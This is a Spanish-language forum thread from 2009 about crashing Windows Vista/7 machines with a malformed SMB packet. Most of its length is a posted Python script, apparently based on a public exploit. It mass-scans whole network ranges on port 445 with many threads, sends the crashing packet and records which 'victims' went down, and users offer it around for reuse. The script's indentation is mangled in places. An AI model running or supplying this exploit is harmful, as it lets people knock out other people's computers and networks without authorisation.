Nuke a Windows. Cuelga tu sistema de nuevo

mTh #91 Sep '09 Frodo Bosón

Más que una queja ha sido un llamamiento... y por lo que se ve ha funcionado. Es la primera vez desde que escribo de manera habitual en asuntos de este tipo en el que un moderador se pone a ocultar post en el foro de software (Bien es cierto que antes al foro de software libre se le prestaba menos atención que a otros y que ahora esta todo más arrejuntado, pero aun así, clap, clap, clap).

Respecto a tu post, en mi opinión no es tan solo cuestión de "costumbre" como pareces indicar (Aunque a lo mejor es una falsa impresión)... Conseguir permisos en windows es un juego de niños y tienes que recurrir a soluciones específicas de cada amenaza para evitar los ataques, mientras que en linux solo se puede conseguir usando citados exploits...

A mi eso me parece más fundamental, una cuestión de base vamos, que simplemente decir "Es que lo normal en windows es usar administrador y en linux no"... digamos que es una capa de defensa más, aunque por supuesto no es perfecta.

Loa #92 Sep '09 :psyduck:

#91 yo antes no era moderador de software libre... y tampoco voy a tirar piedras contra mi propio tejado (se me entiende...) pero mas de uno por aqui se ha llevado su desayuno con racion doble...

como he comentado... en este foro no están permitidos los insultos, en cuanto a las discusiones, como si queréis pensar que el agua no moja

por lo otro, esta claro que no todo se reduce a ello, pero te digo como administrador de maquinass windows y linux que hay muy malas costumbres en windows

guner #93 Sep '09

Yo fui el que se dejó nukear por erdanblo. Firewall de windows off, servicio para compartir archivos e impresoras encendido.

Windows 7 Build 7100. al día de actualizaciones.

PlrA #94 Sep '09 Lame ruedas

Pues yo lo he vuelto a intentar varias veces con el **** phy y nada, como ya he dicho, de RTM ultimate ES nativo a RC7264 y viceversa, nada de nada.

QueTzaL #95 Sep '09 Inocente

#93 Pos eso, 7100

S

S1L3nCe #96 Sep '09

#92 CHOCOPUNTOOOOS! xD

MaKi #97 Sep '09

Bueno el AnuBis me ha picado y llevo como 2 o 3 horas programando xD
He hecho un script, para redes de tipo, B, C y ip único, además hago uso de 200 hilos para evitar las esperas de I/O. Ahora si que compruebo, si el host sigue vivo o no.

Ni me ha dado tiempo a probarlo, pero debería funcionar, codigo fuente:

spoiler

#!/usr/bin/python
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8 :
# Blog:  http://blogricardo.wordpress.com/
# Hecho Ricardo Marmolejo García <[email protected]>
# Basado en el exploit de Laurent Gaffié
# Ultimo cambio : miércoles, 10 de septiembre de 2009 12:30
# Licencia: Creative Commons License Deed: Reconocimiento-No comercial-Compartir bajo la misma licencia 3.0 (  http://blogricardo.wordpress.com/licencia/ )

import time
import sys
import threading
from threading import Thread
from Queue import Queue
from socket import socket
from time import sleep

# configuracion
NUM_THREADS = 50
DEBUG = True
TIPO_RED = 'C'                                           # Tipo: 'B', 'C' o '1'

RED_UNICO = '192.168.1.4'
RED_C = "192.168.1.%d"
RED_B = "192.168.%d.%d"

class Pool:
    def __init__(self , numHilos):
        self.cola = Queue()
        self.numHilos = numHilos
        self.lock = False
        self.interrumpido = False
        self.numTrabajos = 0

def intentarEmpezarTrabajo(self , cola , idWorker , *args):
    while not self.interrumpido:
        if (self.numTrabajos > 0):
            elemento = cola.get()
            self.ejecutar(idWorker , elemento , *args)
            cola.task_done()
            self.numTrabajos -= 1
        else:
            # comprueba si hay tareas cada cierto tiempo
            time.sleep(0.5)
            
def estaOcupado(self):
    return self.numTrabajos > 0

def nuevoElemento(self, elemento):
    self.numTrabajos += 1
    self.cola.put(elemento)

def empezar(self , args=None):
    if not self.lock:
        self.lock = True

        for idWorker in range(self.numHilos):

            lista_args = []
            lista_args.append( self.cola )
            lista_args.append( idWorker )
            if args != None:
                for arg in args:
                    lista_args.append( arg )

            worker = Thread(target=self.intentarEmpezarTrabajo, args=lista_args )
            worker.setDaemon(True)
            worker.start()

        # aqui se bloquea hasta que termine
        self.cola.join()

        self.lock = False

def esLock(self):
    return self.lock

# metodo para sobreescribir
def ejecutar(self , idWorker , elemento , *arg):
    print "Debes sobreescribir el método"
    raise NotImplementedError

def interrumpir(self):
    self.interrumpido = True

# herencia multiple
class PoolNukers(Pool , Thread):
    

def __init__(self, numHilos, listaVictimasExito, listaVictimasFracaso):
    Pool.__init__(self , numHilos)
    Thread.__init__(self)        
    self.numHilos = numHilos
    self.listaVictimasExito = listaVictimasExito
    self.listaVictimasFracaso = listaVictimasFracaso
    self.TIMEOUT = 10
    self.puerto = 445
    self.buff = (
        "\x00\x00\x00\x90" # Begin SMB header: Session message
        "\xff\x53\x4d\x42" # Server Component: SMB
        "\x72\x00\x00\x00" # Negociate Protocol
        "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
        "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
        "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
        "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
        "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
        "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
        "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
        "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
        "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
        "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
        "\x30\x30\x32\x00"
    )

# cuando el hilo empieza -> empieza la pool de 200 cuervos
def run(self):
    self.empezar( args=(self.listaVictimasExito,listaVictimasFracaso,) )

def nuevaVictima(self, victima):
    self.nuevoElemento(victima)
    
def ejecutar(self , numHilo , victima, listaVictimasExito, listaVictimasFracaso):
    
    def estaVivo(victima, puerto):
        try:
            s = socket()
            s.settimeout(3*self.TIMEOUT)
            s.connect((victima,puerto))
            s.send(self.buff)
            s.close()
            return True
        except:
            return False

    try:
        if DEBUG:
            print "Conectando con %s, (timeout de %d segs)" % (victima, self.TIMEOUT)
        s = socket()
        s.settimeout(self.TIMEOUT)
        s.connect((victima,self.puerto))
        if DEBUG:
            print "Enviando cadena a %s" % victima
        s.send(self.buff)
        s.close()
        
        # Comprobar si sigue vivo
        if DEBUG:
            print "%s ha sido atacado, comrpobando si sigue vivo" % victima

        # le dejamos tiempo para morir
        sleep(10)

        if not estaVivo(victima, self.puerto):
            listaVictimasExito.append(victima)
            if DEBUG:
                print "Posible exito con %s !!!" % victima
        else:
            listaVictimasFracaso.append(victima)
    except:
        if DEBUG:
            print "Error enviando la cadena a %s" % victima

listaVictimasExito = []
listaVictimasFracaso = []

poolNukers = PoolNukers(NUM_THREADS, listaVictimasExito, listaVictimasFracaso)
if TIPO_RED == 'B':

# RED TIPO B
cont = 0
for i in range(254):
    for j in range(254):
        host = RED_B % (i+1, j+1)
        poolNukers.nuevaVictima(host)
        cont += 1
elif TIPO_RED == 'C':

# RED TIPO C
cont = 0
for i in range(254):
    host = RED_C % (i+1)
    poolNukers.nuevaVictima(host)
    cont += 1
else:

# 1 única victima
cont = 1
poolNukers.nuevaVictima(RED_UNICO)

print "%d victimas potenciales" % cont
poolNukers.start()
poolNukers.join()

if len(listaVictimasExito) > 0:
    print "\n\nHost atacados y PETADOS"
    print "---------------------------------------------"
    for victima in listaVictimasExito:
         print "%s ha petado ;D" % victima
else:
    print "No se ha petado ninguna victima ;("

if len(listaVictimasFracaso) > 0:
    print "\n\nHost atacados pero continuan en pie"
    print "---------------------------------------------"
    for victima in listaVictimasFracaso:
         print "%s sigue en pie ;(" % victima

Lo he publicado en mi blog, hay lo actualizaré si encuentro algún bug:
http://blogricardo.wordpress.com/2009/09/09/escaner-exploit-para-windows-vista-2008/

aNuBiS #98 Sep '09

#97 Menuda currada !! Lo mio era muy ridiculo .

Por cierto, LOA creo que va siendo de rigor que cambies el titulo del Thread y que #1 se actualice y ponga la lista de sistemas afectados ahora que se sabe que W7 NO esta afectado .

B

[Borrado] #99 Sep '09

#97: Pon el encoding antes del nombre, que si no peta xD (por lo menos a mí). En mi caso, mi hermano tiene XP que no sé si petará, hace el ataque pero no peta vamos xDD

Loa #100 Sep '09 :psyduck:

editado en #1

#97 permiso para C&P tu codigo en #1??

erdanblo #101 Sep '09 Inocente

Algunos sois muy cabezotas.

MaKi #102 Sep '09

#100, tienes permiso ofc pero espera un poco que la gente diga que funciona y eso, desde #1, no puedo actualizar ;P, a mi en linux me funciona pero en windows me da problemas (seguramente por versión de python).

Edit1: ya me funciona en, win, tenía 2 versiones de python, no obstante, necesita un cambio

Edit2: ok #103, pues ya puedes editar, probado en win y parece que funciona, pero no tengo ningún vista k petar. Eso si, si la red que se prueba esta algo petada, o la pool es de demasiados hilos, puedo advertir de haber petado maquinas siendo falso.

erdanblo #103 Sep '09 Inocente

Te edito yo. Total para un post mio que supera la 1º página.

Loa #104 Sep '09 :psyduck:

no me seas victima #103 xD

Usuarios habituales

Tags